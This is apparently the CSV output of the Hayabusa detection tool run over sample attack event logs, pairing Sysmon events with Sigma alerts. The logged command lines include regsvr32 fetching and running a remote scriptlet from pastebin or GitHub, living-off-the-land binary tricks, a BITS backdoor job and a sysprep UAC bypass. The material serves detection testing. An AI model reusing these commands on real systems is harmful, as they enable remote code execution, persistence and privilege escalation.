2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
